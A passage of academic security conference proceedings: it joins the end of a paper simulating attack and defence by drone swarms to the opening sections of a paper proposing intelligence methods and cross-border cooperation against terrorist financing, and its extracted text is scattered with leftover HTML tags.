4.3 Collaboration among UASs <strong>in</strong> attack<br />
From the perspective of the attacker, s<strong>in</strong>ce a s<strong>in</strong>gle attack is not enough, we have explored different<br />
scenarios of attacks of the defensive swarm by another offensive group us<strong>in</strong>g the demonstrator <strong>in</strong>dicated<br />
above.<br />
Among the <strong>in</strong>itial f<strong>in</strong>d<strong>in</strong>gs, it appears that an attack from a team of UASs that beg<strong>in</strong>s by encircl<strong>in</strong>g the<br />
defensive swarm to limit the operat<strong>in</strong>g space <strong>in</strong>creases dramatically the effectiveness of a direct attack,<br />
but needs strong coord<strong>in</strong>ation to have a maximum effect.<br />
We can reverse the demonstration and say that a UAS swarm <strong>in</strong> attack would be practically unstoppable<br />
unless the defender demonstrates strong collaboration. If we describe a cloud of UAS as graph, we th<strong>in</strong>k<br />
it will be possible to use graph match<strong>in</strong>g techniques to distort an attack<strong>in</strong>g swarm with amaz<strong>in</strong>g efficiency<br />
over the defensive swarm.<br />
We can conclude this part by say<strong>in</strong>g that counter<strong>in</strong>g a swarm (<strong>in</strong> defence or attack) is very expensive<br />
because it seems necessary to have high level collaboration on the defence group side. Costs are an<br />
additional vulnerability factor for aerial security aga<strong>in</strong>st a collaborative UAS attack.<br />
5. Conclusion<br />
We started this article by def<strong>in</strong><strong>in</strong>g the new levels of automation and collaboration that the current UAS<br />
technology can offer. We then presented how these new capacities could <strong>in</strong>crease the potential menace<br />
of a terrorist attack us<strong>in</strong>g simple short-range fly<strong>in</strong>g robots and why it seems necessary to start th<strong>in</strong>k<strong>in</strong>g<br />
29
Laurent Beaudo<strong>in</strong>et al.<br />
about appropriate responses to this particular problem. In the last part we have shown with a simplified<br />
demonstrator that some basic rules could give a UAS swarm a strong endurance to kamikaze attack,<br />
which can be used <strong>in</strong> a defensive way to ma<strong>in</strong>ta<strong>in</strong> a local jamm<strong>in</strong>g on an area or <strong>in</strong> an offensive way to<br />
overwhelm the enemy. Aga<strong>in</strong>st collaborative UASs, it seems that the only solution would be smarter and<br />
more numerous UASs. To conclude, our numerical approach has shown its value to estimate the<br />
behaviour and <strong>in</strong>teractions of an UAS swarm. Nevertheless these results should be consolidated by<br />
practical tests; which will need to <strong>in</strong>tegrate the physical constra<strong>in</strong>ts of the robots and their sensors, as the<br />
react<strong>in</strong>g time, the measurements errors <strong>in</strong>clud<strong>in</strong>g the position<strong>in</strong>g error, the process<strong>in</strong>g and<br />
synchronization capacities. Another way of extend<strong>in</strong>g this work could be 3D simulations, with remarkable<br />
<strong>in</strong>crease <strong>in</strong> complexity with both attack and defence strategies.<br />
References<br />
Abatti, J. M. and AL, A., “Small power: the role of micro and small UAVs <strong>in</strong> the future.”, Research report, Air<br />
Command and Staff College, Air University, Maxwell Air Force Base, 2005.<br />
Beaudo<strong>in</strong>, L. and Gademer, A., “Towards symmetrization of asymmetric air dom<strong>in</strong>ance : the potential key role play<strong>in</strong>g<br />
by home-made low cost Unmanned Aerial Systems”, <strong>in</strong> European <strong>Conferences</strong> on Information Warfare and<br />
<strong>Security</strong>, ECIW’10, 2010.<br />
F. Carnu, “The new face of air oriented terrorism and air defence systems vulnerabilities”, <strong>in</strong> Romanian Military<br />
Th<strong>in</strong>k<strong>in</strong>g, p. 108-112, 2010.<br />
Chaumette, S., Laplace, R., Mazel, C. and God<strong>in</strong>, A., “Secure cooperative ad hoc applications with<strong>in</strong> UAV fleets<br />
position paper”, <strong>in</strong> Military Communications Conference, MILCOM 2009. IEEE, p. 1-7, 2009.<br />
Chipmunk game Dynamics, http://code.google.com/p/chipmunk-physics/<br />
Clough, B. T., “UAV swarm<strong>in</strong>g? So what are those swarms, what are the implications, and how do we handle them?”,<br />
2002.<br />
Christ, R. D., Wernli Sr, R. L., “The Rov Manual : a user guide for observation-class remotely operated vehicles”,<br />
Butterwsorth-He<strong>in</strong>emann, Chapter 2 : ROV Design, 2007<br />
Frantz, N. R., “Swarm Intelligence for Autonomous UAV Control”, Thesis, Naval Postgraduate School, Dept. of<br />
Electrical and Computer Eng<strong>in</strong>eer<strong>in</strong>g, 2005.<br />
Gademer, A., Vittori, V. and Beaudo<strong>in</strong>, L., "From light to ultralight UAV", <strong>in</strong> International Conference Unmanned<br />
Aircrafts System Forum, Eurosatory, 2010.<br />
Gademer, A., “Réalité Terra<strong>in</strong> Étendue : une nouvelle approche pour l’extraction de paramètres de surface<br />
biophysiques et géophysiques à l’échelle des <strong>in</strong>dividus”, PhD Thesis, ParisEst University, 2010a.<br />
Gademer, A., Ché́ron, C., Monat, S., Ma<strong>in</strong>froy, F. and, Beaudo<strong>in</strong>,L., ”A low cost spy<strong>in</strong>g quadrotor for global security<br />
applications us<strong>in</strong>g hacked digital cameras”, <strong>in</strong> DEFCON 17, 2009.<br />
Haulman, D. L., “US unmanned aerial vehicles <strong>in</strong> combat, 1991-2003”, Research Paper, Air Force Historical<br />
Research Agency Maxwell Air Force Base, 2003.<br />
Lamont, G.B., “UAV Swarm Mission Plann<strong>in</strong>g Development Us<strong>in</strong>g Evolutionary Algorithms-Part I”, Research Paper,<br />
NATO, SCI-195, 2007,<br />
Lamont, G.B., “UAV Swarm Mission Plann<strong>in</strong>g Development Us<strong>in</strong>g Evolutionary Algorithms and Parallel Simulation-<br />
Part II”, Research Paper, NATO, SCI-195, 2008.<br />
Miasnikov, E., “Threat of Terrorism Us<strong>in</strong>g Unmanned Aerial Vehicles: Technical Aspects”, Technical Repport, Center<br />
for Arms Control, Energy, and Environmental Studies, Moscow Institute of Physics and Technology, 2005.<br />
Mirkarimi, D. B. and Pericak, C., “Counter<strong>in</strong>g the tactical UAV Threat”, Armor, vol. 112, n°. 1, p. 43, 2003.<br />
Valenti, M., Bethke, B., How,J. P., de Farias, D. P. and Vian, J., “Embedd<strong>in</strong>g health management <strong>in</strong>to mission<br />
task<strong>in</strong>g for UAV teams”, <strong>in</strong> American Control Conference, 2007. ACC'07, p. 5777-5783, 2007.<br />
Valenti, M., Dale, D., How, J. and Vian, J. , “Mission health management for 24/7 persistent surveillance operations”,<br />
<strong>in</strong> AIAA Guidance, Navigation and Control Conference and Exhibit, 2007.<br />
S<strong>in</strong>ger, P. W., “Wired for War : the robotics revolution and conflict <strong>in</strong> the 21 st century”, Chapter 3 : Robotics for<br />
dummies,The pengu<strong>in</strong> press, New-York, 2009<br />
30
Develop<strong>in</strong>g Intelligence <strong>in</strong> the Field of F<strong>in</strong>anc<strong>in</strong>g Terror - an<br />
Analytical Model of Anti-Terror Inter Agency and Cross<br />
Border Cooperation: The <strong>Security</strong> of F<strong>in</strong>ancial Systems<br />
Dimension<br />
Alexander Bligh<br />
Ariel University Center, Ariel, Israel<br />
ab1061@columbia.edu<br />
Abstract: This paper presents and analyzes the major challenges fac<strong>in</strong>g counter-terrorism players and proposes<br />
some ways to counter the always-present <strong>in</strong>telligence deficits <strong>in</strong> the field of f<strong>in</strong>anc<strong>in</strong>g terrorism and the threat of<br />
f<strong>in</strong>anc<strong>in</strong>g terrorism. However, this is <strong>in</strong> no way a recipe. The proposals <strong>in</strong>troduced here are <strong>in</strong>tended to raise<br />
awareness and to suggest new approaches, and thus encourage fresh th<strong>in</strong>k<strong>in</strong>g on old issues, <strong>in</strong> the hope that this<br />
will shed light on a narrow angle of the free world’s war on terror. This paper is based on the paper "<strong>Security</strong> through<br />
Science", presented at the 2005 NATO sponsored “Advanced Research Workshop” at the University of Konstanz,<br />
Germany, and later published (Bligh 2006). I have developed this model for a variety of uses, the issue of “dirty<br />
money” among them. It attempts to map the needs and major obstacles, and to offer possible solutions based on the<br />
<strong>in</strong>tegration of an analytical model with the most advanced technological hardware and software available to national<br />
entities at the present time. The approach adopted here <strong>in</strong>tegrates an exist<strong>in</strong>g computerized platform, used by the<br />
U.S. and NATO, with the SWIFT system, along with an orig<strong>in</strong>al analytical model, proposed here, that can be used by<br />
all system members. The system will operate along l<strong>in</strong>es similar to current agreements govern<strong>in</strong>g the global and<br />
national use of credit cards and ATMs. Nevertheless, it is worth not<strong>in</strong>g that the conflict between privacy and security<br />
is particularly acute here because the possession of f<strong>in</strong>ancial assets is one of the most sensitive types of personal<br />
data possible. The paper is divided to the follow<strong>in</strong>g sections: the current map of terror and <strong>in</strong>telligence as related to<br />
the f<strong>in</strong>ancial dimension; the ma<strong>in</strong> challenges and a possible approach to a partial solution; and a proposed<br />
methodology for develop<strong>in</strong>g <strong>in</strong>telligence.<br />
Keywords: terrorism, security, <strong>in</strong>telligence, bank<strong>in</strong>g, money launder<strong>in</strong>g<br />
1. Introduction<br />
Unlike weapons that can be paraded and that sometimes shoot, the transfer of funds is always veiled <strong>in</strong><br />
secrecy. State budgets, and certa<strong>in</strong>ly those of underground organizations, usually hold the secrets of<br />
current and future strategy. In fact, they can tell volumes about the overt and covert sources of f<strong>in</strong>anc<strong>in</strong>g<br />
that enable, or prevent, the carry<strong>in</strong>g out of activities; they carry the secret life of every organization.<br />
Moreover, handl<strong>in</strong>g weapons is probably a less sophisticated undertak<strong>in</strong>g than the effective handl<strong>in</strong>g of<br />
money. A money expert must make sure that it will bear fruit on the one hand, yet not attract the attention<br />
of any law enforcement agency. The expertise necessary for the handl<strong>in</strong>g of funds leads to the<br />
<strong>in</strong>escapable fact that only a handful of experts can handle the f<strong>in</strong>anc<strong>in</strong>g of terrorist organizations. Beyond<br />
their f<strong>in</strong>ancial rout<strong>in</strong>e, they must <strong>in</strong>vest extra care lest they be accused of embezzl<strong>in</strong>g funds and forced to<br />
face retribution. Clearly, s<strong>in</strong>ce there is no need to present balance sheets to very many authorities, the<br />
temptation to misuse funds is greater than <strong>in</strong> public bodies. Thus, collect<strong>in</strong>g <strong>in</strong>telligence on the f<strong>in</strong>ancial<br />
matters of organized crime (O/C) and terrorist organizations may be h<strong>in</strong>dered by several constra<strong>in</strong>ts:<br />
The difficulty <strong>in</strong> <strong>in</strong>filtrat<strong>in</strong>g the small r<strong>in</strong>g of experts who deal with terrorist or O/C money, as well as<br />
the (even) smaller number of f<strong>in</strong>ancial counter-terrorism experts capable of track<strong>in</strong>g these<br />
organizations' budgets.<br />
The typically legitimate fundrais<strong>in</strong>g of religious organizations and the natural concern of governments<br />
about violat<strong>in</strong>g the religious freedoms of <strong>in</strong>nocent citizens.<br />
The tendency of <strong>in</strong>telligence officers to only take <strong>in</strong>to consideration tangible materials rather than<br />
exam<strong>in</strong><strong>in</strong>g organizations’ balance sheets.<br />
Consequently, one of the major, yet understudied, dimensions of the analysis of terrorist activity, and the<br />
ways to counter it, is the f<strong>in</strong>ancial dimension. Like any other activity, legal or illegal, a terrorist has to put a<br />
price tag on achiev<strong>in</strong>g his goals: from reward<strong>in</strong>g the lowliest field operative to the purchase of raw<br />
materials for produc<strong>in</strong>g nuclear devices. Therefore, it is only logical to assume that every terrorist action<br />
works with<strong>in</strong> a budget, which is based on several sources of <strong>in</strong>come and an itemized list of expenses.<br />
S<strong>in</strong>ce many of these organizations operate outside the realm of their sponsor<strong>in</strong>g countries, the f<strong>in</strong>ancial<br />
dimension also <strong>in</strong>volves the issue of transferr<strong>in</strong>g funds while evad<strong>in</strong>g scrut<strong>in</strong>y.<br />
31
Alexander Bligh<br />
The follow<strong>in</strong>g paper presents and analyzes the major challenges fac<strong>in</strong>g counter-terrorism players, and<br />
proposes several ways to counter elements of this threat. However, this is <strong>in</strong> no way a recipe. The<br />
proposals <strong>in</strong>troduced here are <strong>in</strong>tended to raise awareness and to suggest new approaches, and thus<br />
encourage fresh th<strong>in</strong>k<strong>in</strong>g on old issues, <strong>in</strong> the hope that this will shed light on a narrow angle of the free<br />
world’s war on terror.<br />
This paper is based on the paper "<strong>Security</strong> through Science", presented at the 2005 NATO sponsored<br />
“Advanced Research Workshop” at the University of Konstanz, Germany, and later published (Bligh<br />
2006). I have developed this model for a variety of uses, the issue of “dirty money” among them. It<br />
attempts to map the needs and major obstacles, and offers possible solutions based on the <strong>in</strong>tegration of<br />
an analytical model with the most advanced technological hardware and software available to national<br />
entities at the present time.<br />
The approach adopted here <strong>in</strong>tegrates an exist<strong>in</strong>g computerized platform, used by the U.S. and NATO,<br />
with the SWIFT system, along with an orig<strong>in</strong>al analytical model, proposed here, that can be used by all<br />
system members. The system will operate along l<strong>in</strong>es similar to current agreements govern<strong>in</strong>g credit<br />
cards and ATMs. Nevertheless, it is worth not<strong>in</strong>g that the conflict between privacy and security is<br />
particularly acute here because the possession of f<strong>in</strong>ancial assets is one of the most sensitive types of<br />
personal data possible (Ballard 2006).<br />
The paper is divided to the follow<strong>in</strong>g sections: the current map of terror and <strong>in</strong>telligence as related to the<br />
f<strong>in</strong>ancial dimension; the ma<strong>in</strong> challenges and a possible approach to a partial solution; and a proposed<br />
methodology for develop<strong>in</strong>g <strong>in</strong>telligence.<br />
2. The current map<br />
Three major, and apparently unrelated, processes have occurred s<strong>in</strong>ce the beg<strong>in</strong>n<strong>in</strong>g of the 21 st century:<br />
The dramatic development of never-before dreamed of comput<strong>in</strong>g capabilities, and consequently the<br />
<strong>in</strong>creased use of sophisticated communications systems at rapidly decreas<strong>in</strong>g costs.<br />
The wave of terror aga<strong>in</strong>st major centres <strong>in</strong> the West and elsewhere (New York, Moscow, various<br />
parts of Iraq, Madrid, London, Asia, the Indian sub-cont<strong>in</strong>ent, the S<strong>in</strong>ai, various parts of Israel, etc.).<br />
The clos<strong>in</strong>g of the ranks among a grow<strong>in</strong>g number of countries aga<strong>in</strong>st this wave of terror.<br />
The money transfer market is divided <strong>in</strong>to two dist<strong>in</strong>ct branches: a formal, and thus traceable, branch,<br />
which uses systems like SWIFT, and an <strong>in</strong>formal one, us<strong>in</strong>g hawala type systems (Razavy 2005). The<br />
formal field is usually used by <strong>in</strong>nocent bodies (Bloodgood 2011), major firms, and numerous <strong>in</strong>dividuals.<br />
These lawful channels are threatened with misuse by malicious parties. This level is operated by a<br />
number of firms that adhere to pre-established rules and function <strong>in</strong> l<strong>in</strong>e with the anti-launder<strong>in</strong>g laws of<br />
the countries that take part <strong>in</strong> the system. Many large firms have been granted direct access to SWIFT<br />
s<strong>in</strong>ce 2009, while us<strong>in</strong>g one standardized security protocol (Global F<strong>in</strong>ance 2011). At least one of the<br />
firms on the formal tier stated that major money transfers orig<strong>in</strong>ate <strong>in</strong> the U.S., Western Europe and the<br />
Middle East (Fair Disclosure Wire 2007), and that the major recipients are located <strong>in</strong> the Asian Pacific<br />
region, the Indian sub-cont<strong>in</strong>ent, and Africa. It also reported a major <strong>in</strong>crease <strong>in</strong> these transfers between<br />
2002 and 2006. These characteristics clearly reflect the current global foreign labour map: mostly<br />
Muslims from Turkey, Pakistan, the Philipp<strong>in</strong>es, Sri Lanka and various African countries who f<strong>in</strong>d their<br />
way to France, Germany, the oil rich countries <strong>in</strong> the Gulf and, obviously, the USA. The Ch<strong>in</strong>ese factor is<br />
not fully apparent yet but it will undoubtedly become much more significant <strong>in</strong> the years to come. For<br />
many of these receiv<strong>in</strong>g countries, remittances orig<strong>in</strong>at<strong>in</strong>g <strong>in</strong> foreign countries are the major source of<br />
foreign currency that keeps their economies function<strong>in</strong>g. The known money transfers <strong>in</strong> this market equal<br />
to roughly 25-30% of the money transfers tak<strong>in</strong>g place <strong>in</strong> a given year. The total amount of transfers <strong>in</strong><br />
2005 was estimated at $269 billion (Fair Disclosure Wire 2007), which implies that the overall transfers of<br />
that year amounted to around $1 trillion. About 70-75% of this enormous sum is unaccounted for, <strong>in</strong><br />
terms of its sources and/or <strong>in</strong>tended recipients. In 2010-2011, more than one half of the remittances<br />
enter<strong>in</strong>g Bangladesh arrived there us<strong>in</strong>g <strong>in</strong>formal channels (F<strong>in</strong>ancial Express 2011), a fact that does not<br />
necessarily imply that these funds were used for illegal purposes. An official U.S. publication, quot<strong>in</strong>g<br />
<strong>in</strong>ternational f<strong>in</strong>ancial <strong>in</strong>stitutions, estimated annual hawala transfers at approximately $2 trillion,<br />
represent<strong>in</strong>g 2 percent of all <strong>in</strong>ternational f<strong>in</strong>ancial transactions (Olson 2007). These numbers seem out<br />
of context, especially consider<strong>in</strong>g that they are supposedly updated only up to 1995!<br />
32
Alexander Bligh<br />
On the formal level, any discussion must make note of the Brussels-based Society for Worldwide<br />
Interbank F<strong>in</strong>ancial Telecommunications (SWIFT) network, which transmits the <strong>in</strong>structions to execute<br />
most of the transfers that take place through the Clear<strong>in</strong>g House Interbank Payments System (CHIPS,<br />
“...is the premier bank-owned payments system for clear<strong>in</strong>g large value payments. CHIPS is a real-time,<br />
f<strong>in</strong>al payments system for U.S. dollars that uses bi-lateral and multi-lateral nett<strong>in</strong>g for maximum liquidity<br />
efficiency. CHIPS is the only large-value system <strong>in</strong> the world that has the capability of carry<strong>in</strong>g extensive<br />
remittance <strong>in</strong>formation for commercial payments"; http://www.chips.org/home.php) and a second U.S.based<br />
network, Fedwire, (“The Fedwire funds transfer system is a large-dollar electronic payment system<br />
owned and operated by the Federal Reserve Bank that transfers funds between f<strong>in</strong>ancial <strong>in</strong>stitutions on<br />
behalf of their customers. This service operates similarly to Automated Clear<strong>in</strong>ghouse (ACH). However,<br />
depository <strong>in</strong>stitutions typically transfer large dollar payments, such as a down payment for a home<br />
purchase through Fedwire, and use the ACH for small-dollar payments. The majority of Fedwire<br />
transactions are <strong>in</strong>itiated on-l<strong>in</strong>e, and all transactions are completed <strong>in</strong> seconds";<br />
http://www.federalreserveeducation.org/about-the-fed/structure-and-functions/f<strong>in</strong>ancial-services), which<br />
handles almost all U.S. domestic transfers (Shields 2005). In June 2007, Fedwire and CHIPS <strong>in</strong>troduced<br />
a new approach to wir<strong>in</strong>g money domestically. The start<strong>in</strong>g po<strong>in</strong>t for this change was their customers’<br />
convenience and not necessarily the security dimension. Here, as <strong>in</strong> many other security related issues,<br />
the ma<strong>in</strong> conflict is between basic <strong>in</strong>dividual civil rights and the right to security (Treasury & Risk 2007).<br />
Clearly, a significant proportion of the funds used directly or <strong>in</strong>directly for terror purposes are transmitted<br />
through <strong>in</strong>formal channels, though some unknown sums are also channelled through legitimate bank<br />
transfers. Unfortunately, trac<strong>in</strong>g illegal funds <strong>in</strong> the legitimate system, and certa<strong>in</strong>ly <strong>in</strong> the <strong>in</strong>formal hawala<br />
system, is not easy, especially when terrorist organizations are <strong>in</strong>volved. Because the amounts <strong>in</strong>volved<br />
are not high enough to stand out of the entire body of transactions, it is hard to trace the paper trails of<br />
terrorist organizations. U.S. law enforcement agencies suspect that much of al-Qaeda’s fund<strong>in</strong>g for 2001<br />
(amount<strong>in</strong>g to $30 million) was transferred through Middle Eastern hawala networks (Freedman 2005).<br />
However, as it was broken <strong>in</strong>to small <strong>in</strong>stalments, it is doubtful whether any agency noticed it prior to<br />
9/11. Moreover, accord<strong>in</strong>g to the 9/11 Commission, the operat<strong>in</strong>g expenses for the 9/11 attacks were<br />
between $400,000 and $500,000 (Casey 2007). It is difficult to isolate and identify funds f<strong>in</strong>anc<strong>in</strong>g<br />
terrorism from among the enormous number of national and <strong>in</strong>ternational transactions made daily.<br />
Another problem <strong>in</strong> detect<strong>in</strong>g money transfers for illegal purposes is that the money is often supposedly<br />
raised for legitimate religious purposes, and can be labelled as "black" only when put to radical and<br />
terrorist uses. This is almost a mirror image of the situation where money raised by organized crime from<br />
illegal sources is later laundered. The <strong>in</strong>terface between "white" money of radical organizations turn<strong>in</strong>g<br />
"black" and "black" O/C money turn<strong>in</strong>g "white", is also the meet<strong>in</strong>g po<strong>in</strong>t of terrorism and O/C.<br />
3. The ma<strong>in</strong> challenges and a possible approach to a partial solution<br />
Unlike other aspects of combat<strong>in</strong>g terrorism, when deal<strong>in</strong>g with the f<strong>in</strong>ancial dimension there is at least<br />
one clear and measurable criterion: the amount of money seized from terrorist organizations and<br />
personnel. Accord<strong>in</strong>g to this criterion, the rate of success here is rather low, as no significant amounts<br />
have ever been reported to have been seized. In some areas, such as Southeast Asia, the effort on the<br />
f<strong>in</strong>ancial level has been assessed as a failure (Abuza 2003), despite other elements <strong>in</strong> the war on terror<br />
be<strong>in</strong>g successful. Moreover, the dist<strong>in</strong>ction between formal systems and hawala-type systems divides the<br />
war on f<strong>in</strong>anc<strong>in</strong>g terrorism and O/C <strong>in</strong>to two different battlefields.<br />
Recent terrorist activities <strong>in</strong> a score of liberal and liberaliz<strong>in</strong>g nation-states have once aga<strong>in</strong> highlighted<br />
the need to share <strong>in</strong>telligence and to create a comprehensive framework to combat terrorism as one<br />
means of improv<strong>in</strong>g the situation, particularly <strong>in</strong> the context of terror f<strong>in</strong>anc<strong>in</strong>g. This network needs to<br />
overcome the same difficulties that private organizations, f<strong>in</strong>ancial <strong>in</strong>stitutions, national agencies and<br />
countries face when talk<strong>in</strong>g to each other about terrorism, as well as the almost impossible demand for<br />
<strong>in</strong>telligence shar<strong>in</strong>g among agencies, even <strong>in</strong> the same country. Despite of the vary<strong>in</strong>g conditions<br />
between the nations fac<strong>in</strong>g terrorist threats, all are confronted by similar methodological stumbl<strong>in</strong>g blocks:<br />
How can terror-related money transactions be verified, and an association with terrorist activities<br />
established?<br />
How can f<strong>in</strong>ancial <strong>in</strong>stitutions cooperate <strong>in</strong> fight<strong>in</strong>g terrorism? Can combat<strong>in</strong>g terrorism overcome<br />
commercial competition?<br />
Is money launder<strong>in</strong>g, a typical O/C offense, becom<strong>in</strong>g the basis for O/C cooperation with terrorist<br />
organizations?<br />
33
Alexander Bligh<br />
Are differences <strong>in</strong> privacy and anti-terrorism laws render<strong>in</strong>g cross-border cooperation impossible?<br />
Consider<strong>in</strong>g the diversity <strong>in</strong> foreign policies, as well as the varied nature of the terrorist threat <strong>in</strong> the<br />
countries of the free world, is it at all possible to reach at least some basic understand<strong>in</strong>g regard<strong>in</strong>g<br />
the goals and strategy of the war on terror?<br />
Several elements have been put together s<strong>in</strong>ce 9/11, and even before that watershed event, <strong>in</strong> partial<br />
response to some of these issues. None has ever provided a full and comprehensive remedy s<strong>in</strong>ce it is<br />
impossible to achieve one. However, it worthwhile to note that the International Money Launder<strong>in</strong>g<br />
Abatement and F<strong>in</strong>ancial Anti-Terrorism Act of 2001, also known as the 2001 USA Patriot Act Title III,<br />
does not recognize any difference between the illegal f<strong>in</strong>ancial activities of O/C and terrorism, probably<br />
due to the numerous crim<strong>in</strong>al deals between these two types of organizations (Hudson 2010).<br />
The issue of bank policies has been handled with the creation of the F<strong>in</strong>ancial Action Task Force on<br />
Money Launder<strong>in</strong>g (FATF, "The F<strong>in</strong>ancial Action Task Force on Money Launder<strong>in</strong>g was established by<br />
the G-7 Summit that was held <strong>in</strong> Paris <strong>in</strong> 1989 and has today 34 member states. The FATF is an <strong>in</strong>tergovernmental<br />
body whose purpose is the development and promotion of policies, both at national and<br />
<strong>in</strong>ternational levels, to combat money launder<strong>in</strong>g and terrorist f<strong>in</strong>anc<strong>in</strong>g."; http://www.fatfgafi.org/pages/0,3417,en_32250379_32236836_1_1_1_1_1,00.html)<br />
and by national legislation <strong>in</strong> many<br />
countries. The FATF also provides a cross-border system capable of cooperation without compromis<strong>in</strong>g<br />
state secrets and sensitive <strong>in</strong>telligence. However, the issue of small transactions evad<strong>in</strong>g the early<br />
warn<strong>in</strong>g systems has not been resolved yet, and there is no solution <strong>in</strong> sight.<br />
Perhaps, the issue of variation <strong>in</strong> foreign policies and the varied nature of the terrorist threat can be<br />
resolved by def<strong>in</strong><strong>in</strong>g some standardized <strong>in</strong>telligence goals and methods. Indeed, the war aga<strong>in</strong>st terror<br />
necessitates clear, detailed, and timely <strong>in</strong>telligence. All these were basic elements <strong>in</strong> NATO’s battlefield<br />
digitization process, which was <strong>in</strong>troduced <strong>in</strong> the late 1990s. However, <strong>in</strong> those pre-9/11 days, the<br />
process was <strong>in</strong>tended for a somewhat old-fashioned theatre of operations, very much like the Balkans,<br />
for example. Today, data collection and dissem<strong>in</strong>ation are tools not only available to the armed forces.<br />
Other likely consumers today are security services, police forces, and national central banks.<br />
A grow<strong>in</strong>g number of countries have legislation and bodies to combat money launder<strong>in</strong>g. However, they<br />
need to overcome a number of obstacles:<br />
First, no central national/regional/<strong>in</strong>ternational early-warn<strong>in</strong>g system is <strong>in</strong>tegrated with any <strong>in</strong>telligence<br />
service <strong>in</strong> an automated fashion, capable of flagg<strong>in</strong>g suspicious transactions and sett<strong>in</strong>g specific steps <strong>in</strong><br />
motion.<br />
Second, even if national F<strong>in</strong>ancial Intelligence Units (FIUs) operate with<strong>in</strong> a national <strong>in</strong>telligence system,<br />
they may not be open and available to formal f<strong>in</strong>ancial <strong>in</strong>stitutions. Obviously, <strong>in</strong>formal systems are not<br />
subject to any central regulat<strong>in</strong>g body, and constitute a commercial competition to the established banks<br />
and a security threat to governments. Consequently, bank<strong>in</strong>g and national systems only address part of<br />
the issue. Nevertheless, impos<strong>in</strong>g a regulatory and supervisory system will make the transfer of funds<br />
much more difficult for offenders, current or potential. Still, s<strong>in</strong>ce no agreed upon early-warn<strong>in</strong>g system is<br />
available to the banks, it is necessary for an <strong>in</strong>ternational body to devise such an approach, which would<br />
be uniformly used by all banks and be subject to central supervision. Apply<strong>in</strong>g this structure would be a<br />
prerequisite for issu<strong>in</strong>g new, and renew<strong>in</strong>g old, licenses to banks. Employ<strong>in</strong>g this approach would not<br />
compromise any trade secrets, but would enable constant dialogue between banks and law enforcement<br />
agencies. It would also, to some extent, overcome the different rules under which various FIUs operate.<br />
Third, the supervision of formal f<strong>in</strong>ancial <strong>in</strong>stitutions does not <strong>in</strong>clude transactions under a certa<strong>in</strong><br />
m<strong>in</strong>imum (usually $10,000). Thus, no series of small transactions can be identified, if broken along bank<br />
and/or country l<strong>in</strong>es.<br />
The follow<strong>in</strong>g solution addresses the first two problems, but not the third. Whenever relevant money<br />
transactions are <strong>in</strong>volved, two ma<strong>in</strong> players should be considered: the regulators, i.e. the central<br />
governments through their central banks, and the private f<strong>in</strong>ancial <strong>in</strong>stitutions.<br />
Central government and security services operate accord<strong>in</strong>g to laws, regulations and external supervision<br />
through reported and unreported channels. Currently, many countries follow, to a large extent, the<br />
recommendations of the FATF, even if they are not full members. Central government regulations are<br />
34
Alexander Bligh<br />
clearly mandatory, and are always <strong>in</strong> agreement with privacy laws. However, they are never <strong>in</strong> agreement<br />
with the view of the banks that the government is meddl<strong>in</strong>g <strong>in</strong> their bus<strong>in</strong>ess and <strong>in</strong>vad<strong>in</strong>g the privacy of<br />
their customers.<br />
As an alternative to government action, bank<strong>in</strong>g <strong>in</strong>stitutions recommend sett<strong>in</strong>g up private <strong>in</strong>telligence<br />
systems and <strong>in</strong>-house supervision. Establish<strong>in</strong>g this security net will provide them with better control over<br />
<strong>in</strong>telligence, while keep<strong>in</strong>g trade secrets <strong>in</strong>-house. Banks also have their own <strong>in</strong>telligence, which the<br />
central regulator does not possess, particularly visual <strong>in</strong>telligence gathered from surveillance cameras<br />
and f<strong>in</strong>ancial data and records <strong>in</strong> which at least one party is typically identified. Much as this <strong>in</strong>formation<br />
is vital to the end product – the identification of illegal transactions – it tells only one part of the story. The<br />
other part is supplied by the central regulator from lists of central clear<strong>in</strong>g bodies.<br />
The only way to maximize the effectiveness of the data is through digital comparison so that the image of<br />
any person enter<strong>in</strong>g a bank would be automatically transmitted to a central image bank, kept nationally or<br />
<strong>in</strong>ternationally (one option is to store it with<strong>in</strong> the SWIFT database). If the image is not of a wanted<br />
person, the image would be erased and not be reta<strong>in</strong>ed <strong>in</strong> any central database. Based on national<br />
privacy laws, it would also be possible to add any pert<strong>in</strong>ent data to the database (account number, for<br />
<strong>in</strong>stance).<br />
Before it is possible to adopt one mandatory system, the conflict of <strong>in</strong>terest between the threatened<br />
countries and the banks has to be bridged to some extent. A comprehensive solution is probably<br />
impossible, s<strong>in</strong>ce the conflict between the two players is <strong>in</strong>herent. It is clearly the <strong>in</strong>terest of the bank<strong>in</strong>g<br />
<strong>in</strong>stitutions to limit the number of suspected and reported transactions, because this might curb their<br />
profits. As already mentioned, they also aspire to prevent the leak<strong>in</strong>g of bus<strong>in</strong>ess data. However, they<br />
usually prefer to operate <strong>in</strong> agreement with the country’s security and privacy requirements. These<br />
factors should be considered when develop<strong>in</strong>g a new methodological approach.<br />
4. A proposed methodology for develop<strong>in</strong>g <strong>in</strong>telligence<br />
The approach proposed here endeavours to operate along three <strong>in</strong>terwoven dimensions:<br />
Dimension one:<br />
Goal: Reconstruction. Identify<strong>in</strong>g as many elements as possible of the terrorist <strong>in</strong>frastructure and its<br />
operation, from the idea stage up to the execution stage (detonat<strong>in</strong>g a bomb, a hijack<strong>in</strong>g, or a suicide<br />
bomb<strong>in</strong>g that occurred <strong>in</strong> the past). Accountants should verify post factum terror-oriented transactions.<br />
Characterization of personnel: This comparative study can be carried out by teams of academics,<br />
accountants, and terrorism experts.<br />
Methodology: Based on the accumulated experience of foiled terrorist attacks and unfortunate cases that<br />
were studied post mortem. The team will also collect data from exist<strong>in</strong>g literature and will conduct field<br />
research, <strong>in</strong>clud<strong>in</strong>g <strong>in</strong>terviews with apprehended and convicted terrorists and with anti-terrorism and<br />
money launder<strong>in</strong>g experts. This body of evidence will be tabulated, compared, and analyzed, <strong>in</strong>clud<strong>in</strong>g all<br />
early signs which were ignored <strong>in</strong> the past. This will produce a master matrix for a flow chart of a terrorist<br />
event, <strong>in</strong>clud<strong>in</strong>g the money junctions: when, where, why and how money was used, and for what<br />
purposes. The personnel responsible for the monetary dimension would be identified.<br />
End product: The ma<strong>in</strong> outcome of this dimension will be a generic model of a terrorist attack, along with<br />
its f<strong>in</strong>anc<strong>in</strong>g methods and early warn<strong>in</strong>g signs. Put together, this part may be viewed as the creation of a<br />
manual for execut<strong>in</strong>g a terrorist action along with its f<strong>in</strong>anc<strong>in</strong>g, <strong>in</strong>tended to serve all participants, from the<br />
supreme leader almost down to the <strong>in</strong>dividual terrorist.<br />
Dimension two:<br />
